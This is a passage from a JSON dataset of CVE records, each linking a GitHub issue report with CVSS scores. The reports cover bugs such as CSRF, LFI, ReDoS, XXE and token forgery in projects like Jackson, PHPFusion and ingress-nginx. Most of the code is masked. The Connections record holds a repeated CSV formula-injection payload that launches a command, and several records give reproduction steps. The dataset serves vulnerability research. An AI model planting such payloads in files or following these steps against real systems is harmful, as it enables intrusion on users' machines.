        "description": "Floating point exception. Hi, I found a FPE bug on the latest commit APITAG of master. APITAG URLTAG Command: sam2p APITAG FILETAG ASAN says: ~~~ This is sam2p NUMBERTAG Available Loaders: PS PDF JAI PNG JPEG TIFF PNM BMP GIF LBM XPM PCX TGA. Available Appliers: XWD Meta Empty BMP PNG TIFF6 TIFF6 JAI JPEG JAI JPEG PNM GIF NUMBERTAG a+LZW XPM PSL1C PSL NUMBERTAG PDF PSL2+PDF JAI P APITAG sam2p asan: Warning: TGA NUMBERTAG bit image NUMBERTAG bit alpha is greater than NUMBERTAG total bits per pixel sam2p asan: Warning: TGA: reducing to bit alpha NUMBERTAG Floating point exception ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-22783",
        "Issue_Url_old": "https://github.com/ether/etherpad-lite/issues/3421",
        "Issue_Url_new": "https://github.com/ether/etherpad-lite/issues/3421",
        "Repo_new": "ether/etherpad-lite",
        "Issue_Created_At": "2018-07-10T11:27:48Z",
        "description": "plain text password in the database. I can see my admin password in plain text in the database. CODETAG That must not happen NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23349",
        "Issue_Url_old": "https://github.com/sinaweibosdk/weibo_android_sdk/issues/406",
        "Issue_Url_new": "https://github.com/sinaweibosdk/weibo_android_sdk/issues/406",
        "Repo_new": "sinaweibosdk/weibo_android_sdk",
        "Issue_Created_At": "2018-11-08T01:23:12Z",
        "description": "\u65b0\u6d6a\u5fae\u535a\u8d77\u8c03\u79c1\u6709\u7ec4\u4ef6. APITAG sso NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25635",
        "Issue_Url_old": "https://github.com/ansible-collections/community.aws/issues/222",
        "Issue_Url_new": "https://github.com/ansible-collections/community.aws/issues/222",
        "Repo_new": "ansible-collections/community.aws",
        "Issue_Created_At": "2020-09-04T15:25:10Z",
        "description": "aws_ssm connection plugin should garbage collect the s3 bucket after the file transfers. SUMMARY The aws_ssm connection plugin uses an s3 buckets to transfer files to instances. These files remain in the bucket after the play has complete, they are never removed. ISSUE TYPE Bug Report COMPONENT NAME aws_ssm connection plugin ANSIBLE VERSION ansible NUMBERTAG rc2 config file = PATHTAG configured module search path = PATHTAG PATHTAG ansible python module location = PATHTAG executable location = PATHTAG python version NUMBERTAG default, Jul NUMBERTAG GCC NUMBERTAG CONFIGURATION n/a OS / ENVIRONMENT debian NUMBERTAG STEPS TO REPRODUCE NUMBERTAG use the aws_ssm plugin NUMBERTAG look at the s3 bucket it used NUMBERTAG observe that the files are transferred are still there EXPECTED RESULTS The plugin should garbage collect files after transferring them. ACTUAL RESULTS Files written remain there forever.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-28723",
        "Issue_Url_old": "https://github.com/CloudAvid/PParam/issues/9",
        "Issue_Url_new": "https://github.com/cloudavid/pparam/issues/9",
        "Repo_new": "cloudavid/pparam",
        "Issue_Created_At": "2019-04-11T09:57:05Z",
        "description": "Memory Leak in libpparam. Hi MENTIONTAG , I fuzz libparam and found two memory leak, source fuzz : URLTAG crash : URLTAG Thanks, Ramin",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28724",
        "Issue_Url_old": "https://github.com/pallets/werkzeug/issues/822",
        "Issue_Url_new": "https://github.com/pallets/werkzeug/issues/822",
        "Repo_new": "pallets/werkzeug",
        "Issue_Created_At": "2015-12-06T11:54:40Z",
        "description": "dev server sets wrong HTTP_HOST when path starts with a double slash. See URLTAG if APITAG environ['HTTP_HOST'] = APITAG This code was added in NUMBERTAG d NUMBERTAG Do absolute http requests even make sense except for HTTP proxies?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-29668",
        "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/1041",
        "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/1041",
        "Repo_new": "sympa-community/sympa",
        "Issue_Created_At": "2020-11-24T10:54:27Z",
        "description": "Unauthorised full access via SOAP API due to illegal cookie. Version NUMBERTAG el7 on Centos NUMBERTAG Installation method Centos package Expected behavior permission denied Actual behavior error message and action actually executed anyways. Additional information In our setup we have a problem with incorrect cookies via the SOAP API of sympa. If the SOAP request contains a correct cookie everything works as expected > request executed If the SOAP request contains a correct but outdated cookie, everything works as expected > request correctly denied. If the SOAP request contains an arbitrary string as cookie (e.g. \"asdkjasdljkahsdlkjh\"), SOAP replies with an error APITAG session ID in cookie\") but STILL executes every requests we make. By this we can add email adresses to lists without authentication, any operation we tried was still successful. We could hotfix the problem by inserting a APITAG command into PATHTAG like this: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.7,
        "impactScore": 1.4,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35669",
        "Issue_Url_old": "https://github.com/dart-lang/http/issues/511",
        "Issue_Url_new": "https://github.com/dart-lang/http/issues/511",
        "Repo_new": "dart-lang/http",
        "Issue_Created_At": "2020-12-23T11:07:32Z",
        "description": "Header injection and path forgery security issue]. I believe there is a security issue with the current implementation of Request . The full example can be found [here URLTAG What's wrong: Request is passing method verb as is to the stream without any kind of validation. basically: CODETAG generates request like: CODETAG What I'd expect If HTTP verb(method) is not a part of the known set of verbs ( PATHTAG ) I'd expect an exception to be thrown Why this is a security risk If the developer is using Request to abstract generating HTTP calls and he's accepting a method param from the user, the user can do some magic like header injection or path forgery. This can be exploited in many ways and seems to be quite important especially in case there is a reverse proxy is in place . A proxy may just pass someone's request to any host. By running snippet URLTAG behind a proxy, I was nicely redirected( like this URLTAG to APITAG which was injected as per the example above. Let's assume I'm replacing APITAG with APITAG and the victim is working in a company behind the proxy. This means I can redirect calls with headers/cookies(tokens) and blah blah blah.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-35687",
        "Issue_Url_old": "https://github.com/PHPFusion/PHPFusion/issues/2347",
        "Issue_Url_new": "https://github.com/phpfusion/phpfusion/issues/2347",
        "Repo_new": "phpfusion/phpfusion",
        "Issue_Created_At": "2020-12-21T16:21:03Z",
        "description": "CSRF attack leads to deletion of shoutbox messages. Describe the bug PHP Fusion version NUMBERTAG is vulnerable to CSRF attack which leads to deletion of shoutbox messages by the attacker on behalf of the logged in victim.. Version PHP Fusion version NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to ' FILETAG NUMBERTAG Login using Demo credentials NUMBERTAG Create any random shoutbox message post logging into the application NUMBERTAG Now create an HTML form which performs the expected operation of deleting the shoutbox message. The one like below. CODETAG NUMBERTAG Save the above code as html NUMBERTAG Now, re login into the application NUMBERTAG Open the above html file in the same browser in which we are logged in NUMBERTAG Click on submit request and observe the shoutbox message gets deleted NUMBERTAG The attacker can change shout_id to different value and observe that all the shoutbox messages of the logged in user can be deleted. Expected behavior NUMBERTAG Implement an anti CSRF token which is random and changes/destroys after it is used once NUMBERTAG Include this anti CSRF token it in the POST body whenever the user deletes/performs any state changing requests. Screenshots FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-35728",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2999",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2999",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-12-23T04:30:19Z",
        "description": "Block NUMBERTAG more gadget types (placeholder) . (note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Reporter(s): bu5yer (of Sangfor APITAG Security Lab) Mitre id: (to be allocated) Fix will be included in NUMBERTAG usable via APITAG version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35952",
        "Issue_Url_old": "https://github.com/PHPFusion/PHPFusion/issues/2346",
        "Issue_Url_new": "https://github.com/phpfusion/phpfusion/issues/2346",
        "Repo_new": "phpfusion/phpfusion",
        "Issue_Created_At": "2020-12-21T15:40:10Z",
        "description": "User Enumeration in Sign in page. Describe the bug It was observed that the login page of the php fusion throwed different messages upon different username entries. This shows that the product is vulnerable to user enumeration vulnerability. Version PHP Fusion latest version NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to ' FILETAG NUMBERTAG Login using valid credentials NUMBERTAG Add a new user NUMBERTAG Now open a separate private tab, access the URL: FILETAG NUMBERTAG Try logging in with username that we created with wrong password, Observe the product throws message APITAG valid Password NUMBERTAG Now, try logging in with wrong/non existing username and password. Observe the application throws different message NUMBERTAG This difference in error message leads an attacker to collect valid usernames which can ease brute forcing or logging in attempt. Expected behavior Display a common message for any combination of wrong username/password. Screenshots FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-36052",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/38",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/38",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2020-12-23T05:54:12Z",
        "description": "an LFI loophole in FILETAG . In addition to FILETAG , there is also an LFI loophole in FILETAG FILETAG line NUMBERTAG index_file = PATHTAG require $index_file; line NUMBERTAG data = array( 'file' => $page_file, 'path' => $page_path, 'state' => $page_state, 'title' => $page_title, 'date' => $page_date, 'time' => $page_time, 'can_comment' => $page_can_comment, ); $index_file = PATHTAG require $index_file; $mc_pages FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36184",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2998",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2998",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-12-23T04:18:43Z",
        "description": "Block NUMBERTAG more gadget types (placeholder). (note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Reporter(s): Al1ex MENTIONTAG Mitre id: (to be allocated) Fix will be included in NUMBERTAG usable via APITAG version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-36186",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2997",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2997",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-12-23T04:18:08Z",
        "description": "Block NUMBERTAG more gadget types (placeholder NUMBERTAG note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Reporter(s): Al1ex MENTIONTAG Mitre id: (to be allocated) Fix will be included in NUMBERTAG usable via APITAG version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-36188",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2996",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2996",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-12-23T04:09:48Z",
        "description": "Block NUMBERTAG more gadget types (placeholder). (note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Reporter(s): MENTIONTAG Mitre id: (to be allocated) Fix will be included in NUMBERTAG usable via APITAG version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-36255",
        "Issue_Url_old": "https://github.com/scottbrady91/IdentityModel/issues/4",
        "Issue_Url_new": "https://github.com/scottbrady91/identitymodel/issues/4",
        "Repo_new": "scottbrady91/IdentityModel",
        "Issue_Created_At": "2020-08-22T12:40:16Z",
        "description": "Unauthenticated ciphertext attackers can modify tokens. In extension of NUMBERTAG the current code in Branca allows attackers to modify any token's payload without invalidating the Poly NUMBERTAG authentication tag. The implementation fails to authenticate the ciphertext in APITAG at: CODETAG APITAG does not authenticate ciphertext . It writes the tag of the header into ciphertext . This is then later copied again to APITAG . The same issue is in APITAG . APITAG CODETAG Running it returns Tesu instead of Test .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36255",
        "Issue_Url_old": "https://github.com/scottbrady91/IdentityModel/issues/3",
        "Issue_Url_new": "https://github.com/scottbrady91/identitymodel/issues/3",
        "Repo_new": "scottbrady91/IdentityModel",
        "Issue_Created_At": "2020-08-22T12:39:05Z",
        "description": "Poly NUMBERTAG key misuse attackers can forge authenticated tokens. In extension of NUMBERTAG the current code in Branca allows attackers to forge authenticated tokens, if a user uses any given key more than once ( see APITAG URLTAG . The issue lies in the use of the same key for both encryption and authentication of the token. CODETAG and APITAG This will automatically be fixed, if the Branca implementation adheres to the specification.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36320",
        "Issue_Url_old": "https://github.com/vaadin/framework/issues/7757",
        "Issue_Url_new": "https://github.com/vaadin/framework/issues/7757",
        "Repo_new": "vaadin/framework",
        "Issue_Created_At": "2016-07-19T08:14:53Z",
        "description": "APITAG catastrophic exponential time regular expression. Originally by _jtomaszk_ ___ Class APITAG is using unsafe validation regex APITAG example of potential malicious input that validation never ends: APITAG related info [ URLTAG ___ Imported from FILETAG issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36503",
        "Issue_Url_old": "https://github.com/Connections-Business-Directory/Connections/issues/474",
        "Issue_Url_new": "https://github.com/connections-business-directory/connections/issues/474",
        "Repo_new": "connections-business-directory/connections",
        "Issue_Created_At": "2020-05-29T20:57:44Z",
        "description": "Connections NUMBERTAG APITAG Export All feature Affected Version NUMBERTAG APITAG Wordpress NUMBERTAG Step to reproduce NUMBERTAG Login to your website NUMBERTAG isit URLTAG NUMBERTAG In the input filed add payload APITAG NUMBERTAG isit Connections Tools URLTAG and then click on Export All NUMBERTAG It will download a file APITAG open it with Microsoft Excel NUMBERTAG It will open CMD Exported CSV File APITAG APITAG APITAG APITAG APITAG Prefix APITAG Name APITAG Name APITAG Name APITAG Suffix APITAG APITAG APITAG APITAG First APITAG Last APITAG Address NUMBERTAG Line One APITAG Address NUMBERTAG Line Two APITAG Address NUMBERTAG Line Three APITAG Address NUMBERTAG Line Four APITAG Address NUMBERTAG District APITAG Address NUMBERTAG County APITAG Address NUMBERTAG City APITAG Address NUMBERTAG State APITAG Address NUMBERTAG Zipcode APITAG Address NUMBERTAG Country APITAG Address NUMBERTAG APITAG Address NUMBERTAG APITAG Address NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG Visibility|Im Uid|Im APITAG APITAG APITAG APITAG APITAG APITAG APITAG URL NUMBERTAG individual|public APITAG | APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| | | APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| | |public | | | | | | | | | | | | | | | | | | All fields are not checked because APITAG doesn't filter any of the fields. URLTAG Reference > OWASP CSV Injection URLTAG Hopefully, it will fix soon, Let me know if you have any questions. Thanks, APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.0,
        "impactScore": 5.9,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2020-5261",
        "Issue_Url_old": "https://github.com/Sustainsys/Saml2/issues/711",
        "Issue_Url_new": "https://github.com/sustainsys/saml2/issues/711",
        "Repo_new": "sustainsys/saml2",
        "Issue_Created_At": "2017-05-09T17:07:47Z",
        "description": "Reserved Issue . This is a dummy issue, just to reserve an issue number for a future time when a security issue is found or reported privately.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.2,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2020-5268",
        "Issue_Url_old": "https://github.com/Sustainsys/Saml2/issues/712",
        "Issue_Url_new": "https://github.com/sustainsys/saml2/issues/712",
        "Repo_new": "sustainsys/saml2",
        "Issue_Created_At": "2017-05-09T17:08:02Z",
        "description": "Reserved Issue . This is a dummy issue, just to reserve an issue number for a future time when a security issue is found or reported privately.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.3,
        "impactScore": 5.2,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2021-20199",
        "Issue_Url_old": "https://github.com/containers/podman/issues/5138",
        "Issue_Url_new": "https://github.com/containers/podman/issues/5138",
        "Repo_new": "containers/podman",
        "Issue_Created_At": "2020-02-09T22:06:10Z",
        "description": "Source IP always APITAG in rootless Podman NUMBERTAG kind bug Description For a rootless container the source IP of incoming packets on a publish port is always APITAG . Even if the request is made from an external host. Steps to reproduce the issue NUMBERTAG Start a NGINX container: APITAG NUMBERTAG Make a request from another node. APITAG NUMBERTAG Look at the source ip of the request in NGINX stdout log: APITAG Describe the results you received: The logged source address is always APITAG Describe the results you expected: The logged source ip address to match the ip of the host the request was coming from. Additional information you deem important (e.g. issue happens only occasionally): In Podman NUMBERTAG this worked as expected. And it's probably related to: > Rootless Podman now uses Rootlesskit for port forwarding, which should greatly improve performance and capabilities Output of podman version : APITAG Output of APITAG : ERRORTAG Package info (e.g. output of APITAG or apt list podman ): APITAG Additional environment details (AWS, APITAG physical, etc.): Silverblue NUMBERTAG APITAG Edition)",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-22564",
        "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/708",
        "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/708",
        "Repo_new": "libjxl/libjxl",
        "Issue_Created_At": "2021-10-08T08:45:08Z",
        "description": "Crash during multiple concurrent/parallel decoding. Hello, This crash occurs when a Qt application decode more JXL files at the same time via my qt jpegxl image plugin URLTAG During the crash I see following message: APITAG ERRORTAG Here is a simple console application I am able to reproduce crash easily: FILETAG How to compile and run: APITAG The application decodes bucuresti2.jxl file in two threads NUMBERTAG main thread NUMBERTAG worker thread). Each thread have different instance of the plug in and each plug in create own APITAG It may not crash during first iteration, but sooner or later it crashes. The output may run like this: CODETAG Sometime it crashes immediately: CODETAG When just one thread with plug in is running at a time, there is no crash.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-23424",
        "Issue_Url_old": "https://github.com/Tjatse/ansi-html/issues/19",
        "Issue_Url_new": "https://github.com/tjatse/ansi-html/issues/19",
        "Repo_new": "tjatse/ansi-html",
        "Issue_Created_At": "2021-05-07T15:06:26Z",
        "description": "Exponential APITAG Posting here as unable to contact maintainer. Doyensec Vulnerability Advisory Regular Expression Denial of Service APITAG in ansi html Affected Product: ansi html NUMBERTAG endor: URLTAG Severity: Low Vulnerability Class: Denial of Service Status: Open Author(s): Ben Caller APITAG SUMMARY The npm package ansi html uses a regular expression which is vulnerable to Regular Expression Denial of Service APITAG If an attacker provides a malicious string, ansi html will get stuck processing the input for an extremely long time. TECHNICAL DESCRIPTION The vulnerable regular expression is NUMBERTAG d+) m URLTAG Due to the APITAG part, this regular expression has catastrophic backtracking when given a long string of digits. The behaviour occurs as long as the digits are not followed immediately by an 'm'. The complexity is exponential: increasing the length of the malicious string by one makes processing take about twice as long. REPRODUCTION STEPS In nodejs, run: APITAG Notice that node hangs at NUMBERTAG CPU. Increasing the number of spaces increases the processing time. On my laptop that would take three minutes to complete, whereas APITAG would take just over one year to complete. REMEDIATION Remove the asterisk from the regular expression on line NUMBERTAG Doyensec APITAG is an independent security research and development company focused on vulnerability discovery and remediation. We work at the intersection of software development and offensive engineering to help companies craft secure code. Copyright NUMBERTAG by Doyensec LLC. All rights reserved. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given. The information in the advisory is believed to be accurate at the time of publishing based on currently available information, and it is provided as is, as a free service to the community by Doyensec LLC. There are no warranties with regard to this information, and Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23463",
        "Issue_Url_old": "https://github.com/h2database/h2database/issues/3195",
        "Issue_Url_new": "https://github.com/h2database/h2database/issues/3195",
        "Repo_new": "h2database/h2database",
        "Issue_Created_At": "2021-10-22T07:07:50Z",
        "description": "Report a H2 Database Engine SQLXML XXE vulnerability. Hello, I am threedr3am of APITAG Security Lab URLTAG ( EMAILTAG lub). We found a security vulnerability(SCSL NUMBERTAG in the H2 Database Engine jar URLTAG when using this component to connect to the h2 database , The returned data content field is parsed through SQLXML, which will cause the client XXE ( FILETAG Oracle mysql jdbc also recently fixed a similar security vulnerability, please refer to: URLTAG This is their fix commit: URLTAG vulnerability detail: When analyzing the data returned by the database, the APITAG class provides the APITAG method, which parses the string data into an object of the APITAG class. FILETAG When the object executes the APITAG APITAG method, if the input parameter is APITAG it will result in unprotected parsing of XML, resulting in XXE. FILETAG vulnerability reproduction NUMBERTAG The table exists in the database ERRORTAG NUMBERTAG There is data in the tb_test table CODETAG NUMBERTAG Query the database to return the message field and parse it through SQLXML CODETAG NUMBERTAG result FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-25742",
        "Issue_Url_old": "https://github.com/kubernetes/ingress-nginx/issues/7837",
        "Issue_Url_new": "https://github.com/kubernetes/ingress-nginx/issues/7837",
        "Repo_new": "kubernetes/ingress-nginx",
        "Issue_Created_At": "2021-10-21T16:08:21Z",
        "description": "CVETAG : Ingress nginx custom snippets allows retrieval of ingress nginx serviceaccount token and secrets across all namespaces. Issue Details A security issue was discovered in ingress nginx where a user that can create or update ingress objects can use the custom snippets feature to obtain all secrets in the cluster. This issue has been rated High ( PATHTAG URLTAG , and assigned CVETAG . Affected Components and Configurations This bug affects ingress nginx. Multitenant environments where non admin users have permissions to create Ingress objects are most affected by this issue. Affected Versions with no mitigation NUMBERTAG APITAG NUMBERTAG or NUMBERTAG Set allow snippet annotations URLTAG to false in your ingress nginx APITAG based on how you deploy ingress nginx: Static Deploy Files Edit the APITAG for ingress nginx after deployment: APITAG Add directive: APITAG CODETAG APITAG to false APITAG URLTAG URLTAG Detection If you find evidence that this vulnerability has been exploited, please contact security APITAG Additional Details See ingress nginx Issue NUMBERTAG for more details. Acknowledgements This vulnerability was reported by Mitch Hulscher. Thank You, CJ Cullen on behalf of the Kubernetes Security Response Committee",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 4.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-27845",
        "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/194",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/194",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2019-02-18T06:33:54Z",
        "description": "bugs found by our bug scanner. Hi all, Our bug scanner has reported some bugs. Bug triggering files are attached. Bug NUMBERTAG div/mod zero NUMBERTAG in function APITAG , FILETAG ERRORTAG Divisor: rawsize Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , FILETAG CODETAG Divisor: cmpt >hstep, cmpt >vstep Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , FILETAG CODETAG CODETAG CODETAG Divisor: cmpt >hstep, cmpt >vstep Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , FILETAG APITAG Divisor: scale Result: Could be NUMBERTAG Please Check.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32265",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/545",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/545",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2020-08-22T01:47:18Z",
        "description": "A global buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG mp NUMBERTAG aac (latest master NUMBERTAG b NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG show layout show samples show sample data APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
